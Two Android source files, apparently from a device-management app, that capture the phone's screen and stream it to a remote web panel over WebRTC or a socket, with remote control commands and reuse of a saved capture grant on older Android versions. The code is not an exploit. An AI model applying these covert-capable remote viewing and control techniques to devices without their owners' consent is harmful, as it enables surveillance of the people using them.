File: FasonMDM-main/fason/app/src/main/java/com/fason/app/features/screen/ScreenCaptureService.java
package com.fason.app.features.screen;

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.media.projection.MediaProjection;
import android.media.projection.MediaProjectionManager;
import android.os.Build;
import android.os.Handler;
import android.os.Looper;
import android.util.DisplayMetrics;
import android.util.Log;
import android.view.WindowManager;

import com.fason.app.core.FasonApp;
import com.fason.app.core.Protocol;
import com.fason.app.core.network.SocketClient;
import com.fason.app.service.MainService;

import org.json.JSONArray;
import org.json.JSONObject;
import org.webrtc.DataChannel;
import org.webrtc.DefaultVideoDecoderFactory;
import org.webrtc.DefaultVideoEncoderFactory;
import org.webrtc.EglBase;
import org.webrtc.IceCandidate;
import org.webrtc.MediaConstraints;
import org.webrtc.MediaStream;
import org.webrtc.PeerConnection;
import org.webrtc.PeerConnectionFactory;
import org.webrtc.ScreenCapturerAndroid;
import org.webrtc.SessionDescription;
import org.webrtc.SurfaceTextureHelper;
import org.webrtc.VideoCapturer;
import org.webrtc.VideoSource;
import org.webrtc.VideoTrack;

import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

import io.socket.client.Socket;

public final class ScreenCaptureService {

    private static final String TAG = "ScreenCaptureService";

    private static volatile ScreenCaptureService instance;
    private static volatile boolean destroyed = false;

    private MediaProjectionManager mpm;
    private Intent projectionData;
    private int projectionResultCode;

    private EglBase eglBase;
    private PeerConnectionFactory peerConnectionFactory;
    private PeerConnection peerConnection;
    private VideoCapturer videoCapturer;
    private SurfaceTextureHelper surfaceTextureHelper;
    private VideoSource videoSource;
    private VideoTrack videoTrack;

    private List<JSONObject> pendingIceCandidates = new ArrayList<>();

    private volatile boolean streaming = false;
    private int screenWidth = 1280;
    private int screenHeight = 720;
    private int targetFps = 30;

    private static int savedResultCode = 0;
    private static Intent savedResultData = null;

    private ScreenCaptureService() {}

    public static synchronized ScreenCaptureService getInstance() {
        if (destroyed) return null;
        if (instance == null) {
            instance = new ScreenCaptureService();
        }
        return instance;
    }

    public static void saveProjectionResult(int resultCode, Intent data) {
        savedResultCode = resultCode;
        savedResultData = data != null ? (Intent) data.clone() : null;
    }

    public static boolean hasSavedProjection() {
        return savedResultCode == Activity.RESULT_OK && savedResultData != null;
    }

    public boolean tryReuse() {
        if (Build.VERSION.SDK_INT >= 34 || !hasSavedProjection()) {
            return false;
        }
        startCapture(savedResultCode, savedResultData);
        return true;
    }

    private void detectScreenSize() {
        try {
            WindowManager wm = (WindowManager) FasonApp.getContext().getSystemService(Context.WINDOW_SERVICE);
            if (wm != null) {
                DisplayMetrics metrics = new DisplayMetrics();
                wm.getDefaultDisplay().getRealMetrics(metrics);
                screenWidth = metrics.widthPixels;
                screenHeight = metrics.heightPixels;
            }
        } catch (Exception ignored) {}
    }

    public void startCapture(int resultCode, Intent data) {
        if (streaming) return;
        this.projectionResultCode = resultCode;
        this.projectionData = data;

        detectScreenSize();

        Context ctx = FasonApp.getContext();
        mpm = (MediaProjectionManager) ctx.getSystemService(Context.MEDIA_PROJECTION_SERVICE);

        MainService svc = MainService.getInstance();
        if (svc != null && Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
            svc.updateType(android.content.pm.ServiceInfo.FOREGROUND_SERVICE_TYPE_MEDIA_PROJECTION);
        }

        if (Build.VERSION.SDK_INT < 34) {
            saveProjectionResult(resultCode, data);
        }

        streaming = true;
        sendStatus(true);
    }

    public void handleWebRtcOffer(JSONObject data) {
        if (!streaming || projectionData == null) return;
        try {
            String sdp = data.getString("sdp");
            JSONArray iceServersArr = data.optJSONArray("iceServers");

            List<PeerConnection.IceServer> iceServers = new ArrayList<>();
            if (iceServersArr != null) {
                for (int i = 0; i < iceServersArr.length(); i++) {
                    JSONObject srv = iceServersArr.getJSONObject(i);
                    PeerConnection.IceServer.Builder builder = PeerConnection.IceServer.builder(srv.getString("urls"));
                    if (srv.has("username")) builder.setUsername(srv.getString("username"));
                    if (srv.has("credential")) builder.setPassword(srv.getString("credential"));
                    iceServers.add(builder.createIceServer());
                }
            }

            if (!initWebRtc(iceServers)) return;

            peerConnection.setRemoteDescription(new SimpleSdpObserver(), new SessionDescription(SessionDescription.Type.OFFER, sdp));
            peerConnection.createAnswer(new SimpleSdpObserver() {
                @Override
                public void onCreateSuccess(SessionDescription sessionDescription) {
                    peerConnection.setLocalDescription(new SimpleSdpObserver(), sessionDescription);
                    try {
                        JSONObject answer = new JSONObject();
                        answer.put("sdp", sessionDescription.description);
                        Socket socket = SocketClient.getInstance().getSocket();
                        if (socket != null) socket.emit(Protocol.WEBRTC_ANSWER, answer);
                    } catch (Exception e) {
                        Log.e(TAG, "Failed to send WebRTC answer", e);
                    }
                }

                @Override
                public void onCreateFailure(String s) {
                    Log.e(TAG, "createAnswer failed: " + s);
                    sendError("WebRTC answer creation failed: " + s);
                }

                @Override
                public void onSetFailure(String s) {
                    Log.e(TAG, "setLocalDescription failed: " + s);
                    sendError("WebRTC local description failed: " + s);
                }
            }, new MediaConstraints());

        } catch (Exception e) {
            Log.e(TAG, "WebRTC Offer error", e);
            sendError("WebRTC Offer error: " + e.getMessage());
        }
    }

    public void handleWebRtcIce(JSONObject data) {
        if (peerConnection == null) {
            pendingIceCandidates.add(data);
            return;
        }
        try {
            String candidate = data.getString("candidate");
            String sdpMid = data.getString("sdpMid");
            int sdpMLineIndex = data.getInt("sdpMLineIndex");
            peerConnection.addIceCandidate(new IceCandidate(sdpMid, sdpMLineIndex, candidate));
        } catch (Exception e) {
            Log.e(TAG, "Failed to add ICE candidate", e);
        }
    }

    private boolean initWebRtc(List<PeerConnection.IceServer> iceServers) {
        if (peerConnection != null) return true;
        if (peerConnectionFactory != null) return false;

        Context ctx = FasonApp.getContext();
        try {
            PeerConnectionFactory.InitializationOptions initOptions = PeerConnectionFactory.InitializationOptions.builder(ctx)
                    .setEnableInternalTracer(true)
                    .createInitializationOptions();
            PeerConnectionFactory.initialize(initOptions);
        } catch (Exception e) {
            Log.e(TAG, "PeerConnectionFactory.initialize failed", e);
            sendError("WebRTC init failed: " + e.getMessage());
            return false;
        }

        try {
            eglBase = EglBase.create();
        } catch (Exception e) {
            Log.e(TAG, "EglBase.create failed", e);
            sendError("EGL init failed: " + e.getMessage());
            return false;
        }

        try {
            DefaultVideoEncoderFactory encoderFactory = new DefaultVideoEncoderFactory(eglBase.getEglBaseContext(), true, true);
            DefaultVideoDecoderFactory decoderFactory = new DefaultVideoDecoderFactory(eglBase.getEglBaseContext());

            peerConnectionFactory = PeerConnectionFactory.builder()
                    .setVideoEncoderFactory(encoderFactory)
                    .setVideoDecoderFactory(decoderFactory)
                    .createPeerConnectionFactory();
        } catch (Exception e) {
            Log.e(TAG, "PeerConnectionFactory creation failed", e);
            cleanPartialInit();
            sendError("WebRTC factory failed: " + e.getMessage());
            return false;
        }

        try {
            PeerConnection.RTCConfiguration rtcConfig = new PeerConnection.RTCConfiguration(iceServers);
            rtcConfig.sdpSemantics = PeerConnection.SdpSemantics.UNIFIED_PLAN;
            rtcConfig.bundlePolicy = PeerConnection.BundlePolicy.MAXBUNDLE;
            rtcConfig.rtcpMuxPolicy = PeerConnection.RtcpMuxPolicy.REQUIRE;

            peerConnection = peerConnectionFactory.createPeerConnection(rtcConfig, new PeerConnection.Observer() {
                @Override
                public void onSignalingChange(PeerConnection.SignalingState signalingState) {}
                @Override
                public void onIceConnectionChange(PeerConnection.IceConnectionState iceConnectionState) {
                    if (iceConnectionState == PeerConnection.IceConnectionState.DISCONNECTED ||
                        iceConnectionState == PeerConnection.IceConnectionState.FAILED) {
                        Log.w(TAG, "ICE connection state: " + iceConnectionState);
                        stopCapture();
                    }
                }
                @Override
                public void onIceConnectionReceivingChange(boolean b) {}
                @Override
                public void onIceGatheringChange(PeerConnection.IceGatheringState iceGatheringState) {}
                @Override
                public void onIceCandidate(IceCandidate iceCandidate) {
                    try {
                        JSONObject ice = new JSONObject();
                        ice.put("candidate", iceCandidate.sdp);
                        ice.put("sdpMid", iceCandidate.sdpMid);
                        ice.put("sdpMLineIndex", iceCandidate.sdpMLineIndex);
                        Socket socket = SocketClient.getInstance().getSocket();
                        if (socket != null) socket.emit(Protocol.WEBRTC_ICE, ice);
                    } catch (Exception e) {
                        Log.e(TAG, "Failed to send ICE candidate", e);
                    }
                }
                @Override
                public void onIceCandidatesRemoved(IceCandidate[] iceCandidates) {}
                @Override
                public void onAddStream(MediaStream mediaStream) {}
                @Override
                public void onRemoveStream(MediaStream mediaStream) {}
                @Override
                public void onDataChannel(DataChannel dataChannel) {
                    dataChannel.registerObserver(new DataChannel.Observer() {
                        @Override
                        public void onBufferedAmountChange(long l) {}
                        @Override
                        public void onStateChange() {}
                        @Override
                        public void onMessage(DataChannel.Buffer buffer) {
                            try {
                                byte[] data = new byte[buffer.data.remaining()];
                                buffer.data.get(data);
                                String message = new String(data, StandardCharsets.UTF_8);

                                if (dataChannel.label().equals("control")) {
                                    JSONObject cmd = new JSONObject(message);
                                    ScreenControlService.handleCommand(cmd);
                                } else if (dataChannel.label().equals("clipboard")) {
                                    JSONObject cmd = new JSONObject(message);
                                }
                            } catch (Exception e) {
                                Log.e(TAG, "DataChannel message error", e);
                            }
                        }
                    });
                }
                @Override
                public void onRenegotiationNeeded() {}
                @Override
                public void onAddTrack(org.webrtc.RtpReceiver rtpReceiver, MediaStream[] mediaStreams) {}
            });

        } catch (Exception e) {
            Log.e(TAG, "PeerConnection creation failed", e);
            cleanPartialInit();
            sendError("PeerConnection failed: " + e.getMessage());
            return false;
        }

        try {
            videoCapturer = new ScreenCapturerAndroid(projectionData, new MediaProjection.Callback() {
                @Override
                public void onStop() {
                    sendError("Screen capture permission revoked");
                    new Handler(Looper.getMainLooper()).post(() -> stopCapture());
                }
            });

            surfaceTextureHelper = SurfaceTextureHelper.create("ScreenCaptureThread", eglBase.getEglBaseContext());
            videoSource = peerConnectionFactory.createVideoSource(true);
            videoCapturer.initialize(surfaceTextureHelper, ctx, videoSource.getCapturerObserver());
            videoCapturer.startCapture(screenWidth, screenHeight, targetFps);

            videoTrack = peerConnectionFactory.createVideoTrack("100", videoSource);
            peerConnection.addTrack(videoTrack);

        } catch (Exception e) {
            Log.e(TAG, "Video capture setup failed", e);
            cleanPartialInit();
            sendError("Video capture failed: " + e.getMessage());
            return false;
        }

        for (JSONObject ice : pendingIceCandidates) {
            handleWebRtcIce(ice);
        }
        pendingIceCandidates.clear();

        return true;
    }

    private void cleanPartialInit() {
        if (videoTrack != null) { videoTrack.dispose(); videoTrack = null; }
        if (videoSource != null) { videoSource.dispose(); videoSource = null; }
        if (surfaceTextureHelper != null) { surfaceTextureHelper.dispose(); surfaceTextureHelper = null; }
        if (videoCapturer != null) {
            try { videoCapturer.stopCapture(); } catch (Exception ignored) {}
            videoCapturer.dispose();
            videoCapturer = null;
        }
        if (peerConnection != null) { peerConnection.close(); peerConnection = null; }
        if (peerConnectionFactory != null) { peerConnectionFactory.dispose(); peerConnectionFactory = null; }
        if (eglBase != null) { eglBase.release(); eglBase = null; }
        pendingIceCandidates.clear();
    }

    public void stopCapture() {
        streaming = false;

        if (videoSource != null) {
            try { videoSource.dispose(); } catch (Exception e) { Log.e(TAG, "vs dispose", e); }
            videoSource = null;
        }
        if (videoCapturer != null) {
            try { videoCapturer.stopCapture(); } catch (Exception e) { Log.e(TAG, "vc stop", e); }
            try { videoCapturer.dispose(); } catch (Exception e) { Log.e(TAG, "vc dispose", e); }
            videoCapturer = null;
        }
        if (surfaceTextureHelper != null) {
            try { surfaceTextureHelper.dispose(); } catch (Exception e) { Log.e(TAG, "sth dispose", e); }
            surfaceTextureHelper = null;
        }
        if (videoTrack != null) {
            try { videoTrack.dispose(); } catch (Exception e) { Log.e(TAG, "vt dispose", e); }
            videoTrack = null;
        }
        if (peerConnection != null) {
            try { peerConnection.close(); } catch (Exception e) { Log.e(TAG, "pc close", e); }
            peerConnection = null;
        }
        if (peerConnectionFactory != null) {
            try { peerConnectionFactory.dispose(); } catch (Exception e) { Log.e(TAG, "pcf dispose", e); }
            peerConnectionFactory = null;
        }
        if (eglBase != null) {
            try { eglBase.release(); } catch (Exception e) { Log.e(TAG, "egl release", e); }
            eglBase = null;
        }
        pendingIceCandidates.clear();

        MainService svc = MainService.getInstance();
        if (svc != null && Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
            svc.releaseType(android.content.pm.ServiceInfo.FOREGROUND_SERVICE_TYPE_MEDIA_PROJECTION);
        }

        sendStatus(false);
    }

    public void setFps(int fps) {
        if (fps > 0 && fps <= 60) {
            this.targetFps = fps;
        }
    }

    public void setQuality(int quality) {
        // Quality adjustment could be implemented via encoder parameters if needed
    }

    public void setScale(float scale) {
        if (scale > 0 && scale <= 1.0f) {
            screenWidth = (int) (screenWidth * scale);
            screenHeight = (int) (screenHeight * scale);
        }
    }

    public boolean isStreaming() {
        return streaming;
    }

    public int getScreenWidth() { return screenWidth; }
    public int getScreenHeight() { return screenHeight; }

    private void sendStatus(boolean streaming) {
        try {
            Socket socket = SocketClient.getInstance().getSocket();
            if (socket != null) {
                JSONObject status = new JSONObject();
                status.put(Protocol.KEY_TYPE, Protocol.KEY_STATUS);
                status.put(Protocol.KEY_STREAMING, streaming);
                status.put(Protocol.KEY_ACCESSIBLE, ScreenControlService.isEnabled());
                socket.emit(Protocol.SCREEN, status);
            }
        } catch (Exception e) {
            Log.e(TAG, "sendStatus failed", e);
        }
    }

    private void sendError(String error) {
        try {
            Socket socket = SocketClient.getInstance().getSocket();
            if (socket != null) {
                JSONObject err = new JSONObject();
                err.put(Protocol.KEY_TYPE, Protocol.KEY_ERROR);
                err.put(Protocol.KEY_ERROR, error);
                socket.emit(Protocol.SCREEN, err);
            }
        } catch (Exception e) {
            Log.e(TAG, "sendError failed", e);
        }
    }

    public void shutdown() {
        stopCapture();
        destroyed = true;
        instance = null;
    }

    private static class SimpleSdpObserver implements org.webrtc.SdpObserver {
        @Override public void onCreateSuccess(SessionDescription sessionDescription) {}
        @Override public void onSetSuccess() {}
        @Override public void onCreateFailure(String s) { Log.e(TAG, "SDP create failure: " + s); }
        @Override public void onSetFailure(String s) { Log.e(TAG, "SDP set failure: " + s); }
    }
}

File: FasonMDM-main/fason/app/src/main/java/com/fason/app/features/screen/ScreenCaptureService.kt
package com.fason.app.features.screen

import android.app.Notification
import android.app.NotificationChannel
import android.app.NotificationManager
import android.app.PendingIntent
import android.app.Service
import android.content.Context
import android.content.Intent
import android.graphics.Rect
import android.media.projection.MediaProjection
import android.media.projection.MediaProjectionManager
import android.os.Build
import android.os.IBinder
import android.util.DisplayMetrics
import android.view.WindowManager
import androidx.core.app.NotificationCompat
import com.fason.app.R
import com.fason.app.core.Protocol
import com.fason.app.core.network.SocketClient
import org.json.JSONObject

class ScreenCaptureService : Service() {
    private var mediaProjection: MediaProjection? = null
    private var screenEncoder: ScreenEncoder? = null
    private var frameDispatcher: ScreenFrameDispatcher? = null
    private var actionController: RemoteActionController? = null

    @Volatile
    private var stopping = false

    @Volatile
    private var streamGeneration = 0L

    companion object {
        @Volatile
        var isStreaming = false
            private set

        @Volatile
        var screenWidth = 0
            private set

        @Volatile
        var screenHeight = 0
            private set

        @Volatile
        var screenDensityDpi = 0
            private set

        @Volatile
        private var activeService: ScreenCaptureService? = null

        /** Routes commands arriving on the normal `order` channel to this service. */
        @JvmStatic
        fun handleRemoteAction(message: String): Boolean {
            val service = activeService ?: return false
            val controller = service.actionController ?: return false
            controller.handleAction(message)
            return true
        }

        @JvmStatic
        fun isRemoteControlAvailable(): Boolean = RemoteControlService.instance != null

        private const val ACTION_START = "START"
        private const val ACTION_STOP = "STOP"
        private const val EXTRA_RESULT_CODE = "RESULT_CODE"
        private const val EXTRA_DATA = "DATA"
        private const val NOTIFICATION_CHANNEL = "ScreenCaptureChannel"
        private const val NOTIFICATION_ID = 1
        private const val ENCODER_FPS = 30
    }

    private val socketListener = io.socket.emitter.Emitter.Listener { args ->
        val message = when (val payload = args.firstOrNull()) {
            is String -> payload
            is JSONObject -> payload.toString()
            else -> null
        }
        if (message != null) handleRemoteAction(message)
    }

    override fun onCreate() {
        super.onCreate()
        activeService = this
        createNotificationChannel()
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
            startForeground(
                NOTIFICATION_ID,
                createNotification(),
                android.content.pm.ServiceInfo.FOREGROUND_SERVICE_TYPE_MEDIA_PROJECTION,
            )
        } else {
            startForeground(NOTIFICATION_ID, createNotification())
        }
    }

    override fun onStartCommand(intent: Intent?, flags: Int, startId: Int): Int {
        when (intent?.action) {
            ACTION_START -> {
                val resultCode = intent.getIntExtra(EXTRA_RESULT_CODE, 0)
                @Suppress("DEPRECATION")
                val data = intent.getParcelableExtra<Intent>(EXTRA_DATA)
                if (resultCode != 0 && data != null) {
                    startStreaming(resultCode, data)
                } else {
                    emitError("Screen capture permission was not granted")
                    stopSelf()
                }
            }

            ACTION_STOP -> stopSelf()
        }
        return START_NOT_STICKY
    }

    private fun startStreaming(resultCode: Int, data: Intent) {
        stopStreaming(notifyPanel = false)
        val generation = ++streamGeneration
        stopping = false
        actionController = RemoteActionController()

        val metrics = readDisplayMetrics()
        // AVC requires even dimensions. Android display sizes are normally already even.
        screenWidth = metrics.width.coerceAtLeast(2).let { it - (it % 2) }
        screenHeight = metrics.height.coerceAtLeast(2).let { it - (it % 2) }
        screenDensityDpi = metrics.densityDpi

        val socket = SocketClient.getInstance().socket
        socket?.off(Protocol.SCREEN_CTRL, socketListener)
        socket?.on(Protocol.SCREEN_CTRL, socketListener)

        val projectionManager =
            getSystemService(Context.MEDIA_PROJECTION_SERVICE) as MediaProjectionManager
        val projection = projectionManager.getMediaProjection(resultCode, data)
        mediaProjection = projection

        frameDispatcher = ScreenFrameDispatcher().also { it.start() }
        screenEncoder = ScreenEncoder(
            mediaProjection = projection,
            videoWidth = screenWidth,
            videoHeight = screenHeight,
            videoDpi = screenDensityDpi,
            onReady = {
                if (generation == streamGeneration && !stopping) {
                    isStreaming = true
                    emitStatus(streaming = true)
                }
            },
            onFrameEncoded = { frame ->
                if (generation == streamGeneration && !stopping) frameDispatcher?.offer(frame)
            },
            onError = { message ->
                if (generation == streamGeneration && !stopping) {
                    emitError(message)
                    stopSelf()
                }
            },
            onProjectionStopped = {
                if (generation == streamGeneration && !stopping) stopSelf()
            },
        ).also { it.start() }
    }

    private fun stopStreaming(notifyPanel: Boolean = true) {
        val hadStream = isStreaming || screenEncoder != null || mediaProjection != null
        streamGeneration++
        stopping = true
        isStreaming = false

        screenEncoder?.stop()
        screenEncoder = null
        frameDispatcher?.stop()
        frameDispatcher = null

        try {
            mediaProjection?.stop()
        } catch (_: Exception) {
        }
        mediaProjection = null

        SocketClient.getInstance().socket?.let { socket ->
            socket.off(Protocol.SCREEN_CTRL, socketListener)
            if (notifyPanel && hadStream) emitStatus(streaming = false)
        }
        actionController = null
    }

    private fun emitStatus(streaming: Boolean) {
        val status = JSONObject().apply {
            put(Protocol.KEY_TYPE, Protocol.KEY_STATUS)
            put(Protocol.KEY_STREAMING, streaming)
            put(Protocol.KEY_SCREEN_W, screenWidth)
            put(Protocol.KEY_SCREEN_H, screenHeight)
            put("densityDpi", screenDensityDpi)
            put("fps", ENCODER_FPS)
            put("codec", "video/avc")
            put("frameTransport", "binary")
            put(Protocol.KEY_ACCESSIBLE, isRemoteControlAvailable())
        }
        SocketClient.getInstance().socket?.emit(Protocol.SCREEN, status)
    }

    private fun emitError(message: String) {
        val error = JSONObject().apply {
            put(Protocol.KEY_TYPE, Protocol.KEY_ERROR)
            put(Protocol.KEY_ERROR, message)
        }
        SocketClient.getInstance().socket?.emit(Protocol.SCREEN, error)
    }

    private fun readDisplayMetrics(): NativeDisplayMetrics {
        val windowManager = getSystemService(Context.WINDOW_SERVICE) as WindowManager
        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
            val bounds: Rect = windowManager.maximumWindowMetrics.bounds
            NativeDisplayMetrics(
                width = bounds.width(),
                height = bounds.height(),
                densityDpi = resources.configuration.densityDpi,
            )
        } else {
            @Suppress("DEPRECATION")
            val display = windowManager.defaultDisplay
            val metrics = DisplayMetrics()
            @Suppress("DEPRECATION")
            display.getRealMetrics(metrics)
            NativeDisplayMetrics(metrics.widthPixels, metrics.heightPixels, metrics.densityDpi)
        }
    }

    override fun onDestroy() {
        stopStreaming()
        if (activeService === this) activeService = null
        super.onDestroy()
    }

    override fun onBind(intent: Intent?): IBinder? = null

    private fun createNotificationChannel() {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            val channel = NotificationChannel(
                NOTIFICATION_CHANNEL,
                "Screen Capture",
                NotificationManager.IMPORTANCE_LOW,
            )
            getSystemService(NotificationManager::class.java)?.createNotificationChannel(channel)
        }
    }

    private fun createNotification(): Notification {
        val stopIntent = Intent(this, ScreenCaptureService::class.java).apply {
            action = ACTION_STOP
        }
        val stopPendingIntent = PendingIntent.getService(
            this,
            0,
            stopIntent,
            PendingIntent.FLAG_IMMUTABLE or PendingIntent.FLAG_UPDATE_CURRENT,
        )

        return NotificationCompat.Builder(this, NOTIFICATION_CHANNEL)
            .setContentTitle("Remote desktop active")
            .setContentText("Streaming the device screen to the web panel")
            .setSmallIcon(R.mipmap.ic_launcher)
            .addAction(0, "Stop", stopPendingIntent)
            .setOngoing(true)
            .build()
    }

    private data class NativeDisplayMetrics(
        val width: Int,
        val height: Int,
        val densityDpi: Int,
    )

}
